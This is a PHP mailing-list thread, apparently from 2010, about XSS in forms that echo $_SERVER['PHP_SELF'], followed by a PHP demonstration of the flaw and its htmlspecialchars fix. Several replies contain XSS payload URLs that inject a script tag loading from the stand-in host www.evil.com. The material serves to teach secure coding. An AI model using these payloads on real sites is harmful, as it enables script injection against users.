On Wed, Mar 10, 2010 at 23:44, Dmitry Ruban <dmi...@ruban.biz> wrote:
> Hi Jochem,
>
> Jochem Maas wrote:
>>
>> Op 3/10/10 6:23 PM, Joseph Thayne schreef:
>>>
>>> Looks to me like you are closing your form before you put anything in
>>> it.  Therefore, the loan_amount is not set making the value 0.  Follow
>>> the math, and you are dividing by 1-1.
>>>
>>> Change this line:
>>>
>>> <form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post"></form>
>>>
>>> to:
>>>
>>> <form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post">
>>
>> this is a XSS waiting to happen. I can put something like the following in
>> the request uri:
>>
>> index.php?" onsubmit="evil()"><script src="http://www.evil.com/evi.js"></script>
>>
> Apparently it's not going to work. PHP_SELF does not include query string.
> So it is safe to use it this way.
>
> Regards,
> Dmitry

No, it is not safe...

This won't work:
  index.php?" onsubmit="evil()"><script src="http://www.evil.com/evi.js"></script>

But this will:
  index.php/" onsubmit="evil()"><script src="http://www.evil.com/evi.js"></script>

-- 
Daniel Egeberg

--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
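The reason Daniel's second URL works is that $_SERVER['PHP_SELF'] is the script path plus any PATH_INFO trailing it, and the web server URL-decodes PATH_INFO before PHP sees it, so the quote and angle brackets land in the attribute intact. The following is an added example, not code from the thread: it sets PHP_SELF by hand to the value a request for `/index.php/" onsubmit=...` would produce (a constructed value, so it runs from the CLI without a server), renders the form the way Joseph's snippet does, renders it again with the value escaped for an attribute context, and checks whether the attribute was broken out of. The function names are the example's own.

```php
<?php
// Added example, not from the original thread.
// Constructed stand-in for what Apache would place in $_SERVER['PHP_SELF']
// for GET /index.php/%22%20onsubmit=%22evil()%22%3E%3Cscript%20src=%22http://www.evil.com/evi.js%22%3E%3C/script%3E
// PHP_SELF = SCRIPT_NAME + PATH_INFO, and PATH_INFO arrives URL-decoded.
$payload = '/index.php/" onsubmit="evil()"><script src="http://www.evil.com/evi.js"></script>';

// The pattern from the thread: PHP_SELF echoed raw into an attribute value.
function renderFormUnsafe(string $phpSelf): string
{
    return '<form action="' . $phpSelf . '" method="post">';
}

// Hardened version: escape for an HTML attribute context. ENT_QUOTES makes
// htmlspecialchars() encode " and ' as well as < > &, so the value cannot
// terminate the attribute or open a new tag.
function renderFormSafe(string $phpSelf): string
{
    $action = htmlspecialchars($phpSelf, ENT_QUOTES, 'UTF-8');
    return '<form action="' . $action . '" method="post">';
}

// Check: does the rendered tag still have exactly one quoted action attribute
// followed by method="post"? If not, the value escaped its quotes.
function breaksOutOfAttribute(string $html): bool
{
    return preg_match('/^<form action="[^"]*" method="post">$/', $html) !== 1;
}

$unsafe = renderFormUnsafe($payload);
$safe   = renderFormSafe($payload);

echo "Unsafe:  $unsafe\n";
echo "         breaks out of attribute: " . (breaksOutOfAttribute($unsafe) ? 'yes' : 'no') . "\n";
echo "Escaped: $safe\n";
echo "         breaks out of attribute: " . (breaksOutOfAttribute($safe) ? 'yes' : 'no') . "\n";
```

Run with `php example.php`: the unsafe line prints a form tag with a live onsubmit handler and a script tag appended, and the check reports that it broke out; the escaped line prints `&quot;`, `&lt;` and `&gt;` in place of the metacharacters and the check passes. Escaping is the fix that works regardless of which server variable you use; if you would rather not carry PATH_INFO at all, `$_SERVER['SCRIPT_NAME']` or an empty `action=""` (which posts back to the current URL) avoid the problem, but any server variable echoed into markup should still go through htmlspecialchars().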